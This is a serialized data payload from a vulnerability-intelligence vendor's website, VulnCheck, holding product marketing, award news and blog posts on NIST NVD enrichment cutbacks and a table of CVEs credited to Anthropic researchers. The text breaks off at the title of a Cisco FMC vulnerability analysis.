[{"data":1,"prerenderedAt":7845},["ShallowReactive",2],{"index":3,"all-posts":139,"quotes":7820},{"id":4,"title":5,"body":6,"description":7,"extension":8,"landing":9,"meta":53,"navigation":54,"path":55,"platform":56,"seo":81,"stem":82,"threatcon":83,"whitepapers":114,"__hash__":138},"index\u002F0.index.yml","VulnCheck - Outpace Adversaries",null,"Vulnerability intelligence that predicts avenues of attack with speed and accuracy.","yml",{"headline":10,"stats":11,"chart":18},"The cyber threat landscape has changed.",{"from":12,"to":15},{"year":13,"value":14},2020,"1.6 years",{"year":16,"value":17},2025,"21 days",{"title":19,"description":20,"footer":21,"data":22},"From Vulnerability to Exploitation","TTE (Time-to-Exploit) measures the gap between CVE disclosure and confirmed exploitation","Year Published, KEVs, Average Time to Exploitation",[23,28,33,38,43,48],{"year":24,"mean":25,"weaponized":26,"label":27},"2020",567,268,"1.6y",{"year":29,"mean":30,"weaponized":31,"label":32},"2021",227.5,350,"7.6mo",{"year":34,"mean":35,"weaponized":36,"label":37},"2022",365,359,"1y",{"year":39,"mean":40,"weaponized":41,"label":42},"2023",131.5,404,"4.4mo",{"year":44,"mean":45,"weaponized":46,"label":47},"2024",24,436,"24d",{"year":49,"mean":50,"weaponized":51,"label":52},"2025",21,449,"21d",{},true,"\u002F",{"headline":57,"title":58,"features":59,"links":80},"VulnCheck Platform","Exploit Intelligence for Vulnerability Prioritization",[60,65,70,75],{"icon":61,"title":62,"description":63,"to":64},"i-mdi-text-box-search","Exploit & Vulnerability Intelligence","Early access to new vulnerability information not found in the NVD along with dozens of unique fields.","\u002Fproduct\u002Fexploit-intelligence",{"icon":66,"title":67,"description":68,"to":69},"i-mdi-door-open","Initial Access Intelligence","In-house developed exploit PoCs, packet captures, and Suricata signatures to defend against initial access 
vulnerabilities.","\u002Fproduct\u002Finitial-access-intelligence",{"icon":71,"title":72,"description":73,"to":74},"i-mdi-ip-network-outline","IP Intelligence","Detection of potentially vulnerable systems, attacker command & control (C2) infrastructure, and honeypots.","\u002Fproduct\u002Fip-intelligence",{"icon":76,"title":77,"description":78,"to":79},"i-mdi-bird","Canary Intelligence","Data from globally deployed Internet sensors revealing the first signs of vulnerability exploitation.","\u002Fproduct\u002Fcanary-intelligence",[],{"title":5,"description":7},"0.index",{"headline":84,"title":85,"description":86,"features":87,"links":104},"INTRODUCING","A MOVEMENT TO COUNTER EMERGING THREATS","A place where leaders in cyber threat response collaborate to get better, smarter and faster in how we protect our global economy and national security.",[88,94,99],{"icon":89,"title":90,"description":91,"to":92,"target":93},"i-mdi-microphone","Our Keynote Speakers","Andrew Boyd has spent his career safeguarding national security interests, serving in senior intelligence roles across the CIA. Jen Easterly transformed CISA into a $3 billion powerhouse with over 10,000 personnel, establishing the agency as a cornerstone of U.S. cyber defense.","https:\u002F\u002Fwww.threatcon1.org\u002F","_blank",{"icon":95,"title":96,"description":97,"to":98,"target":93},"i-mdi-flag","Capture the Flag","The THREATCON1 CTF challenges participants with a mix of trivia, PCAP analysis, reverse engineering, and exploitation tasks. Teams are welcome, so bring your crew or join up with others on-site. Prizes will be awarded to the top performers.","https:\u002F\u002Fwww.threatcon1.org\u002Fctf",{"icon":100,"title":101,"description":102,"to":103,"target":93},"i-mdi-trophy","The Tournament","THREATCON1’s golf tournament will be played at Reston National Golf Course on Sunday, September 21, 2025. 
Featuring a full driving range, short-game practice area, and a 150-seat grill room where we'll offer pre-golf lunch and post-round refreshments.","https:\u002F\u002Fwww.threatcon1.org\u002Fgolf-tournament",[105,109],{"label":106,"to":107,"trailingIcon":108},"Submit Presentation","https:\u002F\u002Fwww.threatcon1.org\u002Fsubmissions","i-mdi-arrow-right",{"label":110,"aria-label":111,"icon":112,"to":92,"target":93,"color":113},"Learn More","Learn More About THREATCON1","i-mdi-calendar","secondary",[115,121,127,133],{"title":116,"subtitle":117,"img":118,"cta":119,"link":120,"external":54},"The 2026 VulnCheck Exploit Intelligence Report","In 2025, barely 1% of disclosed vulnerabilities were exploited in the wild. Yet those that were exploited were operationalized quickly, attracted diverse threat actors, and often caused outsized damage before organizations had a chance to respond. This report identifies which vulnerabilities mattered, why attackers targeted them, and where timing failures left organizations exposed.","\u002Fresources\u002F2026-VEIR-Report-Cover.png","Download The Report","https:\u002F\u002Fwwv.vulncheck.com\u002F2026-vulncheck-exploit-intelligence-report",{"title":122,"subtitle":123,"img":124,"cta":125,"link":126,"external":54},"Speed Matters in Vulnerability Analysis","Learn how to apply VulnCheck NVD++ to reliable workflows and product enrichment with speed, precision and accuracy.","\u002Fthumbnails\u002Fnvd-danger-backlog.png","Download Vulnerability Analysis","https:\u002F\u002Fwwv.vulncheck.com\u002Fnvd-backlog-report",{"title":128,"subtitle":129,"img":130,"cta":131,"link":132,"external":54},"Enrich Your Cyber Platform with Exploit Intelligence","This guide will help unlock use cases for cybersecurity product teams to enrich platform value with the best exploit intelligence in the industry.","\u002Fthumbnails\u002Frethinking-vulnerability-exploit-intelligence.png","Download White 
Paper","https:\u002F\u002Fwwv.vulncheck.com\u002Frethinking-intel-cyber-platforms-whitepaper",{"title":134,"subtitle":135,"cta":119,"link":136,"external":54,"img":137},"2026 State of Exploitation: Exploring the Network Edge","Derived from the 2026 State of Exploitation Report, this research examines 181 known exploited network edge device vulnerabilities from 2025 and uncovers a significant gap between where exploitation is actually occurring and what most security teams are tracking. More than three-quarters of these vulnerabilities do not appear in CISA KEV, and nearly half affect devices that vendors no longer support. The devices being targeted are not limited to enterprise firewalls; consumer routers, wireless bridges, and mass-market networking equipment are a major part of the picture.","https:\u002F\u002Fwwv.vulncheck.com\u002F2026-network-edge-device-report","\u002Fresources\u002F2026-network-edge-cover.png","ix-KIsmUmJ7KlO_RyghQsSCMfxGkFTg8DZDosgRtACI",{"news":140,"blog":202,"events":7266,"press":7497},[141,162,178],{"id":142,"title":143,"authors":6,"body":144,"date":151,"description":152,"extension":153,"link":154,"logo":155,"meta":156,"navigation":54,"path":157,"seo":158,"source":6,"stem":159,"type":160,"__hash__":161},"news\u002Fnews\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator.md","VulnCheck Named as a Prestigious 2025 SINET16 Innovator",{"type":145,"value":146,"toc":147},"minimark",[],{"title":148,"searchDepth":149,"depth":149,"links":150},"",2,[],"2025-10-15","Company's Unique Approach to Exploit Intelligence Receives Another Elite Industry 
Recognition","md","\u002Fpress\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator","\u002Fawards\u002Fsinet-16-2025.png",{},"\u002Fnews\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator",{"title":143,"description":152},"news\u002Fvulncheck-recognized-as-a-2025-sinet16-innovator","awards","N2hT7bCf8665cBQ2V36ck33mThVeN9E1JaHVYeoW6dQ",{"id":163,"title":164,"authors":6,"body":165,"date":169,"description":170,"extension":153,"link":171,"logo":172,"meta":173,"navigation":54,"path":174,"seo":175,"source":6,"stem":176,"type":160,"__hash__":177},"news\u002Fnews\u002Fmass-technology-leadership-council-tech-top50-startup-of-the-year-winner.md","The Massachusetts Technology Leadership Council (MTLC) Tech Top 50 Startup of the Year 2025: VulnCheck",{"type":145,"value":166,"toc":167},[],{"title":148,"searchDepth":149,"depth":149,"links":168},[],"2025-03-25","The Massachusetts Technology Leadership Council (MTLC) announced the winners and honorees of its annual Tech Top 50 for 2025 on March 13 which recognizes the leaders powering Massachusetts’ tech ecosystem. 
VulnCheck won Startup of the Year 2025.","https:\u002F\u002Fwww.mtlc.co\u002F2024-tech-top-50","\u002Fawards\u002Fmtlc_startup_honoree-2025.png",{},"\u002Fnews\u002Fmass-technology-leadership-council-tech-top50-startup-of-the-year-winner",{"title":164,"description":170},"news\u002Fmass-technology-leadership-council-tech-top50-startup-of-the-year-winner","fUU8uG3gWNV_Tltfd586oofmPVnH30h2Z-G8f1IdjU8",{"id":179,"title":180,"authors":6,"body":181,"date":193,"description":194,"extension":153,"link":195,"logo":196,"meta":197,"navigation":54,"path":198,"seo":199,"source":6,"stem":200,"type":160,"__hash__":201},"news\u002Fnews\u002Fforbes-cloud-100.md","Forbes' Cloud 100 List Rising Star",{"type":145,"value":182,"toc":191},[183],[184,185,186],"p",{},[187,188],"img",{"alt":189,"src":190},"alt text","image.png",{"title":148,"searchDepth":149,"depth":149,"links":192},[],"2024-08-05","VulnCheck is honored to be named to the Forbes Cloud 100 List as one of their 20 Rising Stars for our unparalleled vulnerability and exploit data solutions for enterprise, government and cybersecurity solutions providers.","\u002Fpress\u002Fforbes-cloud-100","\u002Fawards\u002Fforbes-cloud-100-2024.jpg",{},"\u002Fnews\u002Fforbes-cloud-100",{"title":180,"description":194},"news\u002Fforbes-cloud-100","riASIyBnmjzsOliPCSL5IQ4_KUI9Ea1uEBzWkiv7Dkk",[203,334,1239],{"id":204,"title":205,"articles":6,"authors":206,"body":212,"date":323,"description":324,"extension":153,"image":6,"link":6,"meta":325,"navigation":54,"path":327,"seo":328,"series":6,"stem":329,"subtype":6,"tags":330,"__hash__":333},"blog\u002Fblog\u002Fexpanding-vulnerability-enrichment.md","VulnCheck’s Commitment to Expanding Access to Vulnerability Enrichment",[207],{"name":208,"avatar":209,"link":210,"linkName":211},"Patrick 
Garrity","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U06EPQ5RXFU-475c2549c30d-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fpatrickmgarrity\u002F","in\u002Fpatrickmgarrity\u002F",{"type":145,"value":213,"toc":317},[214,220,223,226,239,242,245,250,253,264,267,270,279,283,286,292,296,299,303,306,309],[184,215,216],{},[187,217],{"alt":218,"src":219},"VulnCheck Serving Everyone","\u002Fblog\u002Fexpanding-vulnerability-enrichment\u002Fvulncheck-nist.png",[184,221,222],{},"We've heard concerns about National Institute of Standards and Technology (NIST) NVD's announcement this week clarifying their focus will now be much more limited moving forward.",[184,224,225],{},"Starting on April 15, 2026, NIST will prioritize the following CVEs for enrichment:",[227,228,229,233,236],"ul",{},[230,231,232],"li",{},"CVEs appearing in CISA’s Known Exploited Vulnerabilities (KEV) Catalog",[230,234,235],{},"CVEs for software used within the US federal government",[230,237,238],{},"CVEs for critical software as defined by Executive Order 14028",[184,240,241],{},"What this means is that there will be a significant volume of CVEs that will not be enriched by NIST. 
This news comes after over 2 years of degradation in the NIST NVD enrichment services that started in 2024 after a reduction in funding.",[184,243,244],{},"While we appreciate NIST’s transparency in communicating how they will be prioritizing and resourcing enrichment moving forward, this will continue to exacerbate the data gap that NIST NVD has left across CVE records impacting CPE, CWE and CVSS coverage over the past 2 years, which creates negative security outcomes for organizations in the United States and globally.",[246,247,249],"h2",{"id":248},"vulnchecks-commitment-to-the-community","VulnCheck's Commitment to The Community",[184,251,252],{},"In response to NIST NVD’s resource constraints in 2024, VulnCheck launched NVD++ on March 13, 2024, a free Community-accessible service providing:",[227,254,255,258,261],{},[230,256,257],{},"Timely access to NIST NVD data (no 503 Service Unavailable errors)",[230,259,260],{},"NIST NVD 1.0 compliant downloads (no longer supported by NIST)",[230,262,263],{},"Substantially expanded CPE coverage",[184,265,266],{},"Additionally, VulnCheck’s commercially available Exploit & Vulnerability Intelligence product already provides broad coverage for CVSS, CVSS-BT, & CPE lookup. 
One of the measures we took proactively in the past was to add CVSS scores from several vendor advisories to provide near-complete coverage in our commercial offering.",[184,268,269],{},"Thousands of organizations have already adopted VulnCheck NVD++ since we launched the service, in addition to our other community offerings, including VulnCheck KEV, VulnCheck XDB, and Report a Vulnerability Service.",[184,271,272,273],{},"Anyone can access VulnCheck NVD++ as part of VulnCheck Community for free today at: ",[274,275,276],"a",{"href":276,"rel":277},"https:\u002F\u002Fwww.vulncheck.com\u002Fnvd2",[278],"nofollow",[246,280,282],{"id":281},"vulncheck-automated-cpe-generation","VulnCheck Automated CPE Generation",[184,284,285],{},"VulnCheck continues to outperform NIST NVD CPE enrichment in both volume of CVEs and speed. This chart compares VulnCheck CPE generation with NIST NVD over the past year. We remain committed to continuing to expand coverage.",[184,287,288],{},[187,289],{"alt":290,"src":291},"VulnCheck CPE vs. NIST NVD","\u002Fblog\u002Fexpanding-vulnerability-enrichment\u002Fvulncheck-cpe.png",[246,293,295],{"id":294},"expanding-nvd-enrichment-moving-forward","Expanding NVD++ Enrichment Moving Forward",[184,297,298],{},"VulnCheck will expand our NVD++ community and commercial enrichments over the next month to add CVSS scores to CVE records to provide timely and near-complete CVSS coverage.",[246,300,302],{"id":301},"about-vulncheck","About VulnCheck",[184,304,305],{},"VulnCheck is helping organizations not just to solve the vulnerability prioritization challenge - we’re working to help equip any product manager, CSIRT\u002FPSIRT or SecOps team and Threat Hunting team to get faster and more accurate with infinite efficiency using VulnCheck solutions.",[184,307,308],{},"We knew that we needed better data, faster across the board, in our industry. So that’s what we deliver to the market. 
We’re going to continue to deliver key insights on vulnerability management, exploitation and major trends we can extrapolate from our dataset to continuously support practitioners.",[184,310,311,312,316],{},"Are you interested in learning more? If so, VulnCheck's ",[274,313,62],{"href":314,"rel":315},"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Fexploit-intelligence",[278]," has broad threat actor coverage. Register and demo our data today.",{"title":148,"searchDepth":149,"depth":149,"links":318},[319,320,321,322],{"id":248,"depth":149,"text":249},{"id":281,"depth":149,"text":282},{"id":294,"depth":149,"text":295},{"id":301,"depth":149,"text":302},"2026-04-16T10:00:00-05:00","In response to NIST NVD's announcement that it will significantly limit CVE enrichment starting April 15, 2026, VulnCheck reaffirms its commitment to filling the data gap through its free NVD++ community service and plans to expand coverage with CVSS scores over the next month",{"slug":326},"expanding-vulnerability-enrichment","\u002Fblog\u002Fexpanding-vulnerability-enrichment",{"title":205,"description":324},"blog\u002Fexpanding-vulnerability-enrichment",[331,332],"cve","nist-nvd","8cA4uhkARDZHCuGktrt-I7sRkQyskN5ZAowKo_6oFWU",{"id":335,"title":336,"articles":6,"authors":337,"body":339,"date":1229,"description":1230,"extension":153,"image":6,"link":6,"meta":1231,"navigation":54,"path":1233,"seo":1234,"series":6,"stem":1235,"subtype":6,"tags":1236,"__hash__":1238},"blog\u002Fblog\u002Fanthropic-glasswing-cves.md","Tracking CVEs Attributed to Anthropic Researchers and Project Glasswing",[338],{"name":208,"avatar":209,"link":210,"linkName":211},{"type":145,"value":340,"toc":1220},[341,344,348,362,365,369,384,388,391,394,397,400,488,492,1141,1144,1182,1186,1189,1192,1195,1202,1206,1209,1211,1213,1215],[184,342,343],{},"Anthropic's Project Glasswing has generated significant attention—but very little concrete data. 
One question keeps coming up: what exactly did it find, disclose, and receive CVEs for? We've fielded this question repeatedly, so I did the work of tracking down publicly disclosed CVEs credited to the Anthropic research team at this time.",[246,345,347],{"id":346},"key-takeaways","Key Takeaways",[227,349,350,353,356,359],{},[230,351,352],{},"75 CVEs mention “Anthropic”",[230,354,355],{},"40 are actually credited to Anthropic researchers",[230,357,358],{},"Only 1 is explicitly attributed to Glasswing",[230,360,361],{},"10 are from external collaboration programs (Calif.io \u002F MADBugs)",[184,363,364],{},"Taken together, this suggests that while Anthropic researchers are actively contributing to vulnerability discovery and that work appears promising, the publicly attributable impact of Glasswing itself remains limited so far.",[246,366,368],{"id":367},"methodology","Methodology",[184,370,371,372,377,378,383],{},"I started by re-reading the ",[274,373,376],{"href":374,"rel":375},"https:\u002F\u002Fwww.anthropic.com\u002Fglasswing",[278],"Glasswing report"," and the advisories published at ",[274,379,382],{"href":380,"rel":381},"https:\u002F\u002Fred.anthropic.com\u002F",[278],"red.anthropic.com",". Neither source provides a comprehensive CVE list of vulnerabilities discovered by Anthropic. So I searched the full CVE record database for every CVE record containing the term \"anthropic\" and reviewed each one.",[246,385,387],{"id":386},"what-disclosed-vulnerabilities-have-been-credited-to-the-anthropic-research-team","What Disclosed Vulnerabilities Have Been Credited to the Anthropic Research Team?",[184,389,390],{},"75 CVE records contain the term \"Anthropic.\" Of those, 40 are credited to Anthropic or Anthropic-affiliated researchers in the credits field. 
The remaining 35 are CVEs affecting Anthropic tools like Claude Code, MCP Inspector, and third-party integrations, which are out of scope for this analysis.",[184,392,393],{},"Searching the credits field for \"Anthropic\" is one way to explore this question today, though the credits vary. The 40 break down across three distinct credit attributions: the core Anthropic research team, Nicholas Carlini individually, and Calif.io, an independent security research firm running a program called MADBugs (Month of AI-Discovered Bugs) that credits their work jointly as \"Calif.io in collaboration with Claude and Anthropic Research.\" The 9 wolfSSL CVEs and the NGINX CVE all fall into that third category.",[184,395,396],{},"CVE credits are not standardized and depend on how individual CNAs populate the field, meaning attribution is incomplete and sometimes inconsistent.",[184,398,399],{},"Here is the breakdown by vendor:",[401,402,403,419],"table",{},[404,405,406],"thead",{},[407,408,409,413,416],"tr",{},[410,411,412],"th",{},"Vendor",[410,414,415],{},"Product",[410,417,418],{},"# of CVEs",[420,421,422,434,444,455,464,473],"tbody",{},[407,423,424,428,431],{},[425,426,427],"td",{},"Mozilla",[425,429,430],{},"Firefox",[425,432,433],{},"28",[407,435,436,439,441],{},[425,437,438],{},"wolfSSL",[425,440,438],{},[425,442,443],{},"9",[407,445,446,449,452],{},[425,447,448],{},"F5",[425,450,451],{},"NGINX Plus",[425,453,454],{},"1",[407,456,457,460,462],{},[425,458,459],{},"FreeBSD",[425,461,459],{},[425,463,454],{},[407,465,466,469,471],{},[425,467,468],{},"OpenSSL",[425,470,468],{},[425,472,454],{},[407,474,475,481,483],{},[425,476,477],{},[478,479,480],"strong",{},"Total",[425,482],{},[425,484,485],{},[478,486,487],{},"40",[246,489,491],{"id":490},"the-list-of-40-cves-attributed-to-anthropic","The List of 40 CVEs Attributed to Anthropic",[401,493,494,514],{},[404,495,496],{},[407,497,498,501,504,506,508,511],{},[410,499,500],{},"CVE Number",[410,502,503],{},"Date 
Published",[410,505,412],{},[410,507,415],{},[410,509,510],{},"CVSS",[410,512,513],{},"Credit",[420,515,516,534,549,564,579,595,610,625,640,655,670,685,700,715,730,745,760,775,790,805,820,836,851,867,883,898,914,929,945,962,979,996,1014,1030,1046,1062,1079,1094,1109,1125],{},[407,517,518,521,524,526,528,531],{},[425,519,520],{},"CVE-2026-2763",[425,522,523],{},"2026-02-24",[425,525,427],{},[425,527,430],{},[425,529,530],{},"9.8",[425,532,533],{},"Evyatar Ben Asher, Keane Lucas, Nicholas Carlini, Newton Cheng, Daniel Freeman, Alex Gaynor, and Joel Weinberger using Claude from Anthropic",[407,535,536,539,541,543,545,547],{},[425,537,538],{},"CVE-2026-2764",[425,540,523],{},[425,542,427],{},[425,544,430],{},[425,546,530],{},[425,548,533],{},[407,550,551,554,556,558,560,562],{},[425,552,553],{},"CVE-2026-2765",[425,555,523],{},[425,557,427],{},[425,559,430],{},[425,561,530],{},[425,563,533],{},[407,565,566,569,571,573,575,577],{},[425,567,568],{},"CVE-2026-2766",[425,570,523],{},[425,572,427],{},[425,574,430],{},[425,576,530],{},[425,578,533],{},[407,580,581,584,586,588,590,593],{},[425,582,583],{},"CVE-2026-2769",[425,585,523],{},[425,587,427],{},[425,589,430],{},[425,591,592],{},"8.8",[425,594,533],{},[407,596,597,600,602,604,606,608],{},[425,598,599],{},"CVE-2026-2770",[425,601,523],{},[425,603,427],{},[425,605,430],{},[425,607,592],{},[425,609,533],{},[407,611,612,615,617,619,621,623],{},[425,613,614],{},"CVE-2026-2771",[425,616,523],{},[425,618,427],{},[425,620,430],{},[425,622,530],{},[425,624,533],{},[407,626,627,630,632,634,636,638],{},[425,628,629],{},"CVE-2026-2772",[425,631,523],{},[425,633,427],{},[425,635,430],{},[425,637,592],{},[425,639,533],{},[407,641,642,645,647,649,651,653],{},[425,643,644],{},"CVE-2026-2773",[425,646,523],{},[425,648,427],{},[425,650,430],{},[425,652,530],{},[425,654,533],{},[407,656,657,660,662,664,666,668],{},[425,658,659],{},"CVE-2026-2774",[425,661,523],{},[425,663,427],{},[425,665,430],{},[425,667,592],{},[425,669,533],{},[407,6
71,672,675,677,679,681,683],{},[425,673,674],{},"CVE-2026-2775",[425,676,523],{},[425,678,427],{},[425,680,430],{},[425,682,530],{},[425,684,533],{},[407,686,687,690,692,694,696,698],{},[425,688,689],{},"CVE-2026-2785",[425,691,523],{},[425,693,427],{},[425,695,430],{},[425,697,592],{},[425,699,533],{},[407,701,702,705,707,709,711,713],{},[425,703,704],{},"CVE-2026-2786",[425,706,523],{},[425,708,427],{},[425,710,430],{},[425,712,592],{},[425,714,533],{},[407,716,717,720,722,724,726,728],{},[425,718,719],{},"CVE-2026-2787",[425,721,523],{},[425,723,427],{},[425,725,430],{},[425,727,592],{},[425,729,533],{},[407,731,732,735,737,739,741,743],{},[425,733,734],{},"CVE-2026-2788",[425,736,523],{},[425,738,427],{},[425,740,430],{},[425,742,530],{},[425,744,533],{},[407,746,747,750,752,754,756,758],{},[425,748,749],{},"CVE-2026-2789",[425,751,523],{},[425,753,427],{},[425,755,430],{},[425,757,592],{},[425,759,533],{},[407,761,762,765,767,769,771,773],{},[425,763,764],{},"CVE-2026-2791",[425,766,523],{},[425,768,427],{},[425,770,430],{},[425,772,530],{},[425,774,533],{},[407,776,777,780,782,784,786,788],{},[425,778,779],{},"CVE-2026-2796",[425,781,523],{},[425,783,427],{},[425,785,430],{},[425,787,530],{},[425,789,533],{},[407,791,792,795,797,799,801,803],{},[425,793,794],{},"CVE-2026-2797",[425,796,523],{},[425,798,427],{},[425,800,430],{},[425,802,592],{},[425,804,533],{},[407,806,807,810,812,814,816,818],{},[425,808,809],{},"CVE-2026-2799",[425,811,523],{},[425,813,427],{},[425,815,430],{},[425,817,592],{},[425,819,533],{},[407,821,822,825,827,829,831,834],{},[425,823,824],{},"CVE-2026-2804",[425,826,523],{},[425,828,427],{},[425,830,430],{},[425,832,833],{},"5.4",[425,835,533],{},[407,837,838,841,843,845,847,849],{},[425,839,840],{},"CVE-2026-2805",[425,842,523],{},[425,844,427],{},[425,846,430],{},[425,848,530],{},[425,850,533],{},[407,852,853,856,859,861,863,865],{},[425,854,855],{},"CVE-2026-4702",[425,857,858],{},"2026-03-24",[425,860,427],{},[425,862,430],{},[425,8
64,530],{},[425,866,533],{},[407,868,869,872,874,876,878,881],{},[425,870,871],{},"CVE-2026-4704",[425,873,858],{},[425,875,427],{},[425,877,430],{},[425,879,880],{},"7.5",[425,882,533],{},[407,884,885,888,890,892,894,896],{},[425,886,887],{},"CVE-2026-4705",[425,889,858],{},[425,891,427],{},[425,893,430],{},[425,895,530],{},[425,897,533],{},[407,899,900,903,905,907,909,912],{},[425,901,902],{},"CVE-2026-4718",[425,904,858],{},[425,906,427],{},[425,908,430],{},[425,910,911],{},"8.1",[425,913,533],{},[407,915,916,919,921,923,925,927],{},[425,917,918],{},"CVE-2026-4723",[425,920,858],{},[425,922,427],{},[425,924,430],{},[425,926,530],{},[425,928,533],{},[407,930,931,934,936,938,940,943],{},[425,932,933],{},"CVE-2026-4724",[425,935,858],{},[425,937,427],{},[425,939,430],{},[425,941,942],{},"9.1",[425,944,533],{},[407,946,947,950,952,954,956,959],{},[425,948,949],{},"CVE-2026-27654",[425,951,858],{},[425,953,448],{},[425,955,451],{},[425,957,958],{},"8.2",[425,960,961],{},"Calif.io in collaboration with Claude and Anthropic Research",[407,963,964,967,970,972,974,976],{},[425,965,966],{},"CVE-2026-4747",[425,968,969],{},"2026-03-26",[425,971,459],{},[425,973,459],{},[425,975,592],{},[425,977,978],{},"Nicholas Carlini using Claude, Anthropic",[407,980,981,984,987,989,991,993],{},[425,982,983],{},"CVE-2026-28386",[425,985,986],{},"2026-04-07",[425,988,468],{},[425,990,468],{},[425,992,942],{},[425,994,995],{},"Stanislav Fort (Aisle Research); Pavel Kohout (Aisle Research); Alex Gaynor (Anthropic)",[407,997,998,1001,1004,1006,1008,1011],{},[425,999,1000],{},"CVE-2026-5194",[425,1002,1003],{},"2026-04-09",[425,1005,438],{},[425,1007,438],{},[425,1009,1010],{},"9.3",[425,1012,1013],{},"Nicholas Carlini from 
Anthropic",[407,1015,1016,1019,1021,1023,1025,1028],{},[425,1017,1018],{},"CVE-2026-5446",[425,1020,1003],{},[425,1022,438],{},[425,1024,438],{},[425,1026,1027],{},"6.0",[425,1029,961],{},[407,1031,1032,1035,1037,1039,1041,1044],{},[425,1033,1034],{},"CVE-2026-5503",[425,1036,1003],{},[425,1038,438],{},[425,1040,438],{},[425,1042,1043],{},"6.9",[425,1045,961],{},[407,1047,1048,1051,1053,1055,1057,1060],{},[425,1049,1050],{},"CVE-2026-5447",[425,1052,1003],{},[425,1054,438],{},[425,1056,438],{},[425,1058,1059],{},"6.3",[425,1061,961],{},[407,1063,1064,1067,1070,1072,1074,1077],{},[425,1065,1066],{},"CVE-2026-5466",[425,1068,1069],{},"2026-04-10",[425,1071,438],{},[425,1073,438],{},[425,1075,1076],{},"7.6",[425,1078,961],{},[407,1080,1081,1084,1086,1088,1090,1092],{},[425,1082,1083],{},"CVE-2026-5477",[425,1085,1069],{},[425,1087,438],{},[425,1089,438],{},[425,1091,958],{},[425,1093,961],{},[407,1095,1096,1099,1101,1103,1105,1107],{},[425,1097,1098],{},"CVE-2026-5479",[425,1100,1069],{},[425,1102,438],{},[425,1104,438],{},[425,1106,1076],{},[425,1108,961],{},[407,1110,1111,1114,1116,1118,1120,1123],{},[425,1112,1113],{},"CVE-2026-5500",[425,1115,1069],{},[425,1117,438],{},[425,1119,438],{},[425,1121,1122],{},"8.7",[425,1124,961],{},[407,1126,1127,1130,1132,1134,1136,1139],{},[425,1128,1129],{},"CVE-2026-5501",[425,1131,1069],{},[425,1133,438],{},[425,1135,438],{},[425,1137,1138],{},"8.6",[425,1140,961],{},[184,1142,1143],{},"CVEs Added Post Blog Publication",[401,1145,1146,1162],{},[404,1147,1148],{},[407,1149,1150,1152,1154,1156,1158,1160],{},[410,1151,500],{},[410,1153,503],{},[410,1155,412],{},[410,1157,415],{},[410,1159,510],{},[410,1161,513],{},[420,1163,1164],{},[407,1165,1166,1169,1172,1175,1178,1180],{},[425,1167,1168],{},"CVE-2026-5588",[425,1170,1171],{},"2026-04-15",[425,1173,1174],{},"Legion of the Bouncy Castle 
Inc.",[425,1176,1177],{},"BC-JAVA",[425,1179,1059],{},[425,1181,978],{},[246,1183,1185],{"id":1184},"what-vulnerabilities-are-directly-attributable-to-glasswing","What Vulnerabilities Are Directly Attributable to Glasswing?",[184,1187,1188],{},"Despite the attention around Glasswing, only one publicly disclosed CVE can currently be directly tied to it. CVE-2026-4747 (FreeBSD NFS RCE) is explicitly attributed to Glasswing and Mythos Preview by name, described as fully autonomously identified and exploited.",[184,1190,1191],{},"The Glasswing page also references three vulnerabilities without CVE numbers: a 27-year-old OpenBSD flaw, a 16-year-old FFmpeg bug, and Linux kernel privilege escalation chains. All three are still under embargo pending patches.",[184,1193,1194],{},"The broader limitation is that Anthropic committed the details of additional findings via cryptographic hashes prior to public disclosure as they are currently under embargo until a patch is released and the vulnerability is publicly disclosed. The full picture won't be known until public disclosure takes place and Anthropic has indicated a public summary report is expected around July 2026.",[184,1196,1197,1198,1201],{},"The July 2026 report will be the real tell. When Anthropic follows through with a full public accounting of what Glasswing found and fixed, it will provide broader visibility into the details you might be looking for. 
Until then, the best signals available are the CVE credits field and Anthropic's own advisories at ",[274,1199,382],{"href":380,"rel":1200},[278],".",[246,1203,1205],{"id":1204},"considerations-for-anthropic","Considerations for Anthropic",[184,1207,1208],{},"It would be beneficial for Anthropic to create a dedicated security advisory page where security advisories and vulnerability disclosures were published in a consistent way, to provide a way for consumers to understand the question: what vulnerabilities have been discovered by the Anthropic research team and Project Glasswing?",[246,1210,302],{"id":301},[184,1212,305],{},[184,1214,308],{},[184,1216,311,1217,316],{},[274,1218,62],{"href":314,"rel":1219},[278],{"title":148,"searchDepth":149,"depth":149,"links":1221},[1222,1223,1224,1225,1226,1227,1228],{"id":346,"depth":149,"text":347},{"id":367,"depth":149,"text":368},{"id":386,"depth":149,"text":387},{"id":490,"depth":149,"text":491},{"id":1184,"depth":149,"text":1185},{"id":1204,"depth":149,"text":1205},{"id":301,"depth":149,"text":302},"2026-04-15T10:00:00-05:00","A primary source breakdown of every CVE publicly credited to Anthropic researchers and Project Glasswing, based on a full search of the CVE record database.",{"slug":1232},"anthropic-glasswing-cves","\u002Fblog\u002Fanthropic-glasswing-cves",{"title":336,"description":1230},"blog\u002Fanthropic-glasswing-cves",[331,1237],"ai","lSVHc_NuEoHuRjSXdmTGCf5V2aCFmUoIuhQDnKEJ8MQ",{"id":1240,"title":1241,"articles":6,"authors":1242,"body":1248,"date":7256,"description":7257,"extension":153,"image":6,"link":6,"meta":7258,"navigation":54,"path":7260,"seo":7261,"series":6,"stem":7262,"subtype":6,"tags":7263,"__hash__":7265},"blog\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079.md","CVE-2026-20079 - Cisco FMC Authentication Bypass RCE Analysis",[1243],{"name":1244,"avatar":1245,"link":1246,"linkName":1247},"Cale 
